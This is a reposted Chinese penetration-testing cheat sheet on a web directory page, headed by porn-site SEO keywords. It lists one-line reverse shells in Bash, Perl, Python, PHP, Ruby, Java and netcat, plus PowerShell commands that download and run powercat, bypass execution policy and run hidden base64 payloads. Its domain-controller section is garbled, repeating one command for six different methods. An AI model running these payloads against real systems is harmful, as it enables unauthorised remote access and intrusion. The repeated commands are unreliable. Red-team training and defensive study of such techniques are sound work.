日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務,提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747


「干貨」內(nèi)網(wǎng)域?qū)崙?zhàn)滲透常用命令總結(jié)

 

 

一.查找域控的幾種常用方法

 

1.net view

netdom query pdc

 

2.set log

netdom query pdc

 

3.通過srv記錄

netdom query pdc

 

4.使用nltest

netdom query pdc

 

5.使用dsquery

netdom query pdc

 

6.使用netdom

netdom query pdc

 

注釋:這些都是win系統(tǒng)自帶的命令,有的時候win版本不同,有的命令會不存在,所以多一種方法,多一種成功的可能性,實際滲透,自行根據(jù)目標環(huán)境變換。

 

二.各種語言一句話反彈shell

 

Bash [不通用,跟linux發(fā)行版本有關,在ubuntu上測試成功]

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 

PERL

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

php

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3>&3 2>&3");'

 

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d>&%d 2>&%d",f,f,f)'

 

JAVA

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 2="" |="" while="" read="" line;="" do="" $line="">&5 >&5; done"] as String[]) p.waitFor()

 

netcat

nc -e /bin/sh x.x.x.x 2333
但某些版本的nc沒有-e參數(shù)(非傳統(tǒng)版),則可使用以下方式解決rm/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f

 

三.常用Power shell命令

 

1.通過遠程下載來執(zhí)行

Set-ExecutionPolicy RemoteSigned IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

 

2.把ps腳本傳到本地后執(zhí)行

PowerShell.exe -ep Bypass -File d:powercat.ps1

 

3.本地交互式執(zhí)行

E:>PowerShell.exe -ExecutionPolicy Bypass Invoke-PowerShellTcp -Reverse -IPAddress 10.18.180.18 -Port 4444

 

4.把ps腳本編碼成base64來執(zhí)行[實戰(zhàn)用的最多]

powershell -ep bypass -NoLogo -NonInteractive -NoProfile -windowstyle Hidden -enc base64加密過的命令

 

作者:Ms08067安全實驗室

轉(zhuǎn)載注明:https://www.secpulse.com/archives/120372.html

分享到:
標簽:滲透
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定